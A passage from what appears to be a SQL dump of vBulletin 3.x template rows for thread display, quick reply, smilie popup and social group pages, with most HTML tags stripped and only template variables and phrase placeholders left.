    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[display_modes]
    \"$vbphrase[linear_mode]\" $vbphrase[linear_mode]\"$vbphrase[linear_mode]\" $vbphrase[switch_to_linear_mode]
    \"$vbphrase[hybrid_mode]\" $vbphrase[hybrid_mode]\"$vbphrase[hybrid_mode]\" $vbphrase[switch_to_hybrid_mode]
    \"$vbphrase[threaded_mode]\" $vbphrase[threaded_mode]\"$vbphrase[threaded_mode]\" $vbphrase[switch_to_threaded_mode]
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[search_this_thread]
    \r\n \r\n \r\n \r\n \r\n $gobutton
    \r\n
    $vbphrase[advanced_search]
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[rate_this_thread]
    \r\n\r\n
    \"$vbphrase[excellent]\"
    \r\n
    \"$vbphrase[good]\"
    \r\n
    \"$vbphrase[average]\"
    \r\n
    \"$vbphrase[bad]\"
    \r\n
    \"$vbphrase[terrible]\"
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[already_rated_this_thread]
    \r\n
    \r\n
    \r\n \r\n\r\n \r\n \r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n
    colspan=\"2\">$vbphrase[thread_tools]$vbphrase[search_this_thread]
    colspan=\"2\">\r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n $vbphrase[search_this_thread]:
    \r\n $gobutton
    \r\n $vbphrase[advanced_search]\r\n
    \r\n
    \r\n \r\n\r\n
    $vbphrase[display_modes]$vbphrase[rate_this_thread]
    \r\n\r\n \r\n\r\n
    \r\n
    \"$vbphrase[linear_mode]\" $vbphrase[linear_mode]$vbphrase[switch_to_linear_mode]
    \r\n
    \"$vbphrase[hybrid_mode]\" $vbphrase[hybrid_mode]$vbphrase[switch_to_hybrid_mode]
    \r\n
    \"$vbphrase[threaded_mode]\" $vbphrase[threaded_mode]$vbphrase[switch_to_threaded_mode]
    \r\n
    \r\n\r\n \r\n\r\n
    \r\n\r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[rate_this_thread]:
    \r\n $gobutton\r\n
    \r\n
    \r\n \r\n\r\n
    \r\n
    \r\n\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    \r\n $forumrules\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n $vbphrase[admin_tools]:
    \r\n $gobutton\r\n
    \r\n
    \r\n
    \r\n $forumjump\r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n$similarthreads\r\n\r\n$footer\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[you_rated_this_thread]: $threadinfo[vote]\r\n \r\n \r\n \r\n
    \r\n\r\n\r\n', 'template', 1231342385, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'), (1557, -1, 'showthread_bookmarksite', '
  • \r\n \".(($bookmarksite[\'iconpath\']) ? (\"\r\n \\\"\"\r\n \") : (\"\")).\"\r\n $bookmarksite[title]\r\n
  • ', '
  • \r\n \r\n \"<phrase$vbphrase[submit_thread_to_x]\" class=\"inlineimg\" />\r\n \r\n $bookmarksite[title]\r\n
  • ', 'template', 1209402145, 'vBulletin Solutions', '3.7.0', 'vbulletin'), (1558, -1, 'showthread_list', '\r\n\r\n\r\n\r\n$spacer_open\r\n\r\n\r\n\r\n \r\n\r\n\".(($threadedmode==1) ? (\"\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n
    \r\n
    \r\n
    \r\n \r\n\r\n \r\n
    \r\n
    \r\n
    \r\n\r\n$spacer_close', '\r\n\r\n\r\n\r\n$spacer_open\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n
    \r\n
    width:$postlistwidth; overflow:auto; border:2px inset; padding: 0px; text-align:$stylevar[left];\" class=\"alt1\" id=\"links\">\r\n
    \r\n \r\n\r\n \r\n
    \r\n
    \r\n
    \r\n\r\n$spacer_close', 'template', 1249925816, 'vBulletin Solutions', '3.8.4', 'vbulletin'), (1559, -1, 'showthread_quickreply', '\".(($show[\'editor_toolbar\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \".(($show[\'basic_bbcode\']) ? (\"\r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'color_bbcode\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'url_bbcode\'] OR $show[\'img_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'url_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'img_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'quote_bbcode\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \".((is_browser(\'ie\')) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'wysiwyg_compatible\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \\\"$vbphrase[remove_text_formatting]\\\"
    \\\"\\\"
    \\\"$vbphrase[bold]\\\"
    \\\"$vbphrase[italic]\\\"
    \\\"$vbphrase[underline]\\\"
    \\\"\\\"
    \r\n \r\n \r\n \r\n \r\n \r\n
    \\\"\\\"
    options[\'cleargifurl\'] . \"\\\" id=\\\"{$editorid}_color_bar\\\" alt=\\\"\\\" style=\\\"background-color:black\\\" width=\\\"21\\\" height=\\\"4\\\" />
    \\\"\\\"
    \r\n
    \\\"\\\"
    \\\"$vbphrase[insert_link]\\\"
    \\\"$vbphrase[insert_image]\\\"
    \\\"\\\"
    \\\"$vbphrase[wrap_quote_tags]\\\"
     
    \\\"$vbphrase[check_spelling]\\\"
    \r\n
    \\\"$vbphrase[decrease_size]\\\"
    \r\n
    \\\"$vbphrase[increase_size]\\\"
    \r\n
    \\\"$vbphrase[switch_editor_mode]\\\"
    \r\n
    \r\n\") : (\"\")).\"\r\n
    \r\n
    \r\n \".(($show[\'qr_require_click\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n
    \r\n \r\n
    \r\n\r\n\r\nsession->vars[\'styleid\'] . \"\\\" />\r\n\r\n', '\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"$vbphrase[remove_text_formatting]\"
    \"\"
    \"$vbphrase[bold]\"
    \"$vbphrase[italic]\"
    \"$vbphrase[underline]\"
    \"\"
    \r\n \r\n \r\n \r\n \r\n \r\n
    \"\"
    \"\"
    \"\"
    \r\n
    \"\"
    \"$vbphrase[insert_link]\"
    \"$vbphrase[insert_image]\"
    \"\"
    \"$vbphrase[wrap_quote_tags]\"
     
    \"$vbphrase[check_spelling]\"
    \r\n
    \"$vbphrase[decrease_size]\"
    \r\n
    \"$vbphrase[increase_size]\"
    \r\n
    \"$vbphrase[switch_editor_mode]\"
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n
    \r\n\r\n\r\n\r\n\r\n', 'template', 1238581441, 'vBulletin Solutions', '3.8.3', 'vbulletin'), (1560, -1, 'SHOWTHREAD_SHOWPOST', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[view_single_post] - $threadinfo[prefix_plain_html] $threadinfo[title]\r\n\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \r\n $vbphrase[view_single_post]\r\n
    \r\n\r\n\".(($show[\'reputation\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n$postbits\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \r\n  \r\n \r\n
    \r\n\r\n
    \r\n\r\n\".(($show[\'lightbox\']) ? (\"\r\n\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[view_single_post] - $threadinfo[prefix_plain_html] $threadinfo[title]\r\n\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n
    \r\n $vbphrase[thread]: $threadinfo[prefix_plain_html] $threadinfo[title]\r\n
    \r\n $vbphrase[view_single_post]\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n$postbits\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \r\n  \r\n \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n', 'template', 1195729858, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1561, -1, 'showthread_similarthreadbit', '\r\n \r\n \".(($simthread[\'issubscribed\']) ? (\"\\\"\\\"\") : (\"\")).\"\r\n $simthread[prefix_rich] session->vars[\'sessionurl\'] . \"t=$simthread[threadid]\\\" title=\\\"$simthread[preview]\\\">$simthread[title]\r\n \r\n $simthread[postusername]\r\n $simthread[forumtitle]\r\n $simthread[replycount]\r\n $simthread[lastreplydate] $simthread[lastreplytime]\r\n\r\n', '\r\n \r\n \"\"\r\n $simthread[prefix_rich] $simthread[title]\r\n \r\n $simthread[postusername]\r\n $simthread[forumtitle]\r\n $simthread[replycount]\r\n $simthread[lastreplydate] $simthread[lastreplytime]\r\n\r\n', 'template', 1189606012, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1562, -1, 'showthread_similarthreads', '\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n$similarthreadbits\r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[similar_threads]\r\n
    $vbphrase[thread]$vbphrase[thread_starter]$vbphrase[forum]$vbphrase[replies]$vbphrase[last_post]
    \r\n\r\n
    ', '\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n$similarthreadbits\r\n\r\n
    \r\n \"\"\r\n $vbphrase[similar_threads]\r\n
    $vbphrase[thread]$vbphrase[thread_starter]$vbphrase[forum]$vbphrase[replies]$vbphrase[last_post]
    \r\n\r\n
    ', 'template', 1125489810, 'vBulletin Solutions', '3.5.0 Release Candidate 3', 'vbulletin'), (1563, -1, 'smiliepopup', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vbphrase[smilie_list] - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\r\n\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n$smiliebits\r\n\r\n \r\n\r\n
    \r\n $vbphrase[smilie_list]\r\n
    $vbphrase[click_a_smilie_to_insert_it_into_your_message]
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vbphrase[smilie_list] - $vboptions[bbtitle]\r\n\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n$smiliebits\r\n\r\n \r\n\r\n
    \r\n $vbphrase[smilie_list]\r\n
    $vbphrase[click_a_smilie_to_insert_it_into_your_message]
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n', 'template', 1195729858, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1564, -1, 'smiliepopup_category', '\r\n
    $category
    \r\n\r\n', '\r\n
    $category
    \r\n\r\n', 'template', 1069099452, 'vBulletin Solutions', '', 'vbulletin'), (1565, -1, 'smiliepopup_row', '\r\n$smiliecells\r\n\r\n', '\r\n$smiliecells\r\n\r\n', 'template', 1069099457, 'vBulletin Solutions', '', 'vbulletin'), (1566, -1, 'smiliepopup_smilie', '$smiliehtml\r\n$smilie[text]', '$smiliehtml\r\n$smilie[text]', 'template', 1118866827, 'vBulletin Solutions', '3.5.0 Beta 2', 'vbulletin'), (1567, -1, 'smiliepopup_straggler', '$smiliehtml\r\n$smilie[text]', '$smiliehtml\r\n$smilie[text]', 'template', 1118866819, 'vBulletin Solutions', '3.5.0 Beta 2', 'vbulletin'), (1568, -1, 'SOCIALGROUPS', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n$socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    session->vars[\'sessionurl\'] . \"do=grouplist\\\" method=\\\"post\\\">\r\n\r\n\r\n \r\n\r\n\".(($grouplist) ? (\"\r\n \r\n \r\n \r\n \".(($show[\'gminfo\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'pictureinfo\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'gminfo\']) ? (\"\") : (\"\")).\"\r\n \r\n $grouplist\r\n \") : (\"\r\n \r\n \r\n \r\n\")).\"\r\n\r\n\r\n \r\n\r\n
    \r\n
    $vbphrase[search_groups]  
    \r\n $grouplisttitle\r\n \".(($category_name) ? (\"\r\n \" . construct_phrase(\"$vbphrase[in_category_x]\", \"$category_name\") . \"\r\n \") : (\"\")).\"\r\n
    \r\n \".(($show[\'category_names\']) ? (\"$vbphrase[category] $sortarrow[category]\") : (\"\")).\"\r\n $vbphrase[group_name] $sortarrow[name]\r\n \r\n $vbphrase[group_members] $sortarrow[members]\r\n \r\n $vbphrase[discussions] $sortarrow[discussions]\r\n \r\n $vbphrase[messages] $sortarrow[messages]\r\n \r\n $vbphrase[pictures] $sortarrow[pictures]\r\n \r\n $vbphrase[last_post] $sortarrow[lastpost]\r\n
    $vbphrase[no_groups_to_display]
    \r\n session->vars[\'sessionurl\'] . \"do=search\\\">$vbphrase[advanced_search]\r\n  \r\n session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[group_subscriptions]\r\n
    \r\n\r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n \".(($pagenav) ? (\"\r\n
    \r\n $pagenav\r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'creategroup\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $custompagetitle\r\n$socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $grouplist\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n
    $vbphrase[search_groups]  
    \r\n $grouplisttitle\r\n \r\n $vbphrase[in_category_x]\r\n \r\n
    \r\n $vbphrase[category] $sortarrow[category]\r\n $vbphrase[group_name] $sortarrow[name]\r\n \r\n $vbphrase[group_members] $sortarrow[members]\r\n \r\n $vbphrase[discussions] $sortarrow[discussions]\r\n \r\n $vbphrase[messages] $sortarrow[messages]\r\n \r\n $vbphrase[pictures] $sortarrow[pictures]\r\n \r\n $vbphrase[last_post] $sortarrow[lastpost]\r\n
    $vbphrase[no_groups_to_display]
    \r\n $vbphrase[advanced_search]\r\n  \r\n $vbphrase[group_subscriptions]\r\n
    \r\n\r\n\r\n\r\n\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1234874426, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1569, -1, 'socialgroups_accepttransfer', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[transfer_group_ownership]
    \r\n \" . construct_phrase(\"$vbphrase[accept_social_group_transfer_x]\", \"$group[name]\") . \"\r\n
    \r\n
    \r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle\r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[transfer_group_ownership]
    \r\n $vbphrase[accept_social_group_transfer_x]\r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1237458622, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1570, -1, 'socialgroups_addpictures', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$messages\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[add_pictures_to_group]
    \r\n
    \r\n
    \r\n \" . construct_phrase(\"$vbphrase[may_add_pictures_group_paste_url]\", \"album.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\") . \"\r\n
    \r\n $vbphrase[picture_urls]: $vbphrase[one_url_per_line_paren]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$messages\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[add_pictures_to_group]
    \r\n
    \r\n
    \r\n $vbphrase[may_add_pictures_group_paste_url]\r\n
    \r\n $vbphrase[picture_urls]: $vbphrase[one_url_per_line_paren]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1218117371, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1571, -1, 'socialgroups_addpicture_invalidurl', '
  • \" . construct_phrase(\"$vbphrase[following_urls_invalid_picture_not_found]\", \"album.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\") . \"\r\n
      $urlbits
    \r\n
  • ', '
  • $vbphrase[following_urls_invalid_picture_not_found]\r\n
      $urlbits
    \r\n
  • ', 'template', 1195493956, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1572, -1, 'socialgroups_addpicture_messagebit', '
  • $message_text
    \r\n\".(($picturebits) ? (\"$picturebits\") : (\"\")).\"
  • \r\n', '
  • $message_text
    \r\n$picturebits
  • \r\n', 'template', 1196261134, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1573, -1, 'socialgroups_addpicture_messages', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[vbulletin_message]
    \r\n
      $messagebits
    \r\n
    \r\n
    ', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[vbulletin_message]
    \r\n
      $messagebits
    \r\n
    \r\n
    ', 'template', 1198870190, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1574, -1, 'socialgroups_categorylist', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n$socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n\r\n\r\n $template_hook[group_categorylist_start_col]\r\n \r\n \r\n $template_hook[group_categorylist_end_col]\r\n\r\n$categorybits\r\n\r\n \r\n\r\n
    \r\n $vbphrase[social_group_categories]\r\n
    \r\n $vbphrase[category_name] $sortarrow[title]\r\n \r\n $vbphrase[groups] $sortarrow[groups]\r\n
    \r\n session->vars[\'sessionurl\'] . \"do=search\\\">$vbphrase[advanced_search]\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n \".(($pagenav) ? (\"\r\n
    \r\n $pagenav\r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $custompagetitle\r\n$socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n\r\n\r\n $template_hook[group_categorylist_start_col]\r\n \r\n \r\n $template_hook[group_categorylist_end_col]\r\n\r\n$categorybits\r\n\r\n \r\n\r\n
    \r\n $vbphrase[social_group_categories]\r\n
    \r\n $vbphrase[category_name] $sortarrow[title]\r\n \r\n $vbphrase[groups] $sortarrow[groups]\r\n
    \r\n $vbphrase[advanced_search]\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1218628241, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1575, -1, 'socialgroups_categorylist_bit', '\r\n $template_hook[group_categorybit_start]\r\n \r\n \r\n
    $category[description]
    \r\n \r\n \r\n session->vars[\'sessionurl\'] . \"cat=$category[categoryid]\\\">$category[groups]\r\n \r\n $template_hook[group_categorybit_end]\r\n', '\r\n $template_hook[group_categorybit_start]\r\n \r\n \r\n
    $category[description]
    \r\n \r\n \r\n $category[groups]\r\n \r\n $template_hook[group_categorybit_end]\r\n', 'template', 1218628137, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1576, -1, 'socialgroups_category_cloud_bit', 'session->vars[\'sessionurl\'] . \"do=grouplist&cat=$category[categoryid]\\\" class=\\\"sg_catcloudlink sg_catlevel$category[level]\\\">$category[title] ', '$category[title] ', 'template', 1217936989, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1577, -1, 'socialgroups_confirm', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n \r\n \r\n \".(($pictureinfo) ? (\"\r\n \r\n \") : (\"\")).\"\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $title_phrase
    $question_phrase\".(($extratext) ? (\"

    $extratext\") : (\"\")).\"
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $title_phrase
    $question_phrase

    $extratext
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1208875321, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1578, -1, 'socialgroups_css', '', '', 'template', 1235391495, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1579, -1, 'socialgroups_deletemessages', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($inline_discussion) ? (\"\r\n $vbphrase[delete_discussions]\r\n \") : (\"\r\n $vbphrase[delete_messages]\r\n \")).\"\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n \".(($canremovemessages AND $candeletemessages) ? (\"\r\n
    $vbphrase[how_would_you_like_to_delete]
    \r\n \") : (\"\")).\"\r\n \".(($candeletemessages) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($canremovemessages) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($candeletemessages) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n \".(($inline_discussion) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[deleting_x_discussions_from_y_social_groups]\", \"$discussioncount\", \"$groupcount\") . \"
    \r\n \") : (\"\r\n
    \" . construct_phrase(\"$vbphrase[deleting_x_messages_in_y_discussions_from_z_social_groups]\", \"$messagecount\", \"$discussioncount\", \"$groupcount\") . \"
    \r\n \")).\"\r\n \".(($discussion_selected AND !$inline_discussion) ? (\"\r\n
    $vbphrase[deleting_the_first_message]
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n $vbphrase[delete_discussions]\r\n \r\n $vbphrase[delete_messages]\r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n \r\n
    $vbphrase[how_would_you_like_to_delete]
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    $vbphrase[deleting_x_discussions_from_y_social_groups]
    \r\n \r\n
    $vbphrase[deleting_x_messages_in_y_discussions_from_z_social_groups]
    \r\n
    \r\n \r\n
    $vbphrase[deleting_the_first_message]
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1212494788, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1580, -1, 'socialgroups_discussion', '\r\n $template_hook[group_discussionbit_start]\r\n \r\n
    \r\n \".(($discussion[\'lastposterid\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$discussion[postuserid]\", \"$discussion[postusername]\") . \"\r\n \") : (\"\r\n $discussion[musername]\r\n \")).\"\r\n
    $discussion[date]\".((!$show[\'detailedtime\']) ? (\" $discussion[time]\") : (\"\")).\"
    \r\n
    \r\n\r\n \".((!$discussion[is_read]) ? (\"\r\n \r\n session->vars[\'sessionurl\'] . \"do=discuss&discussionid=$discussion[discussionid]&goto=$discussion[readtime]#newmessage\\\" id=\\\"thread_gotonew_$discussion[discussionid]\\\" class=\\\"id_goto_unread\\\">\\\"$vbphrase[go_to_first_new_post]\\\" \r\n \".(($discussion[moderated]) ? (\"$vbphrase[moderated_discussion_prefix] \") : (\"\")).\"\r\n $discussion[title]\r\n \r\n \") : (\"\r\n \".(($discussion[moderated]) ? (\"$vbphrase[moderated_discussion_prefix] \") : (\"\")).\"\r\n $discussion[title]\r\n \")).\"\r\n
    \r\n \".(($show[group]) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[group_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$discussion[gmid]#gmessage$discussion[gmid]\", \"$discussion[groupname]\") . \"
    \r\n \") : (\"\r\n
    $discussion[trimmessage]
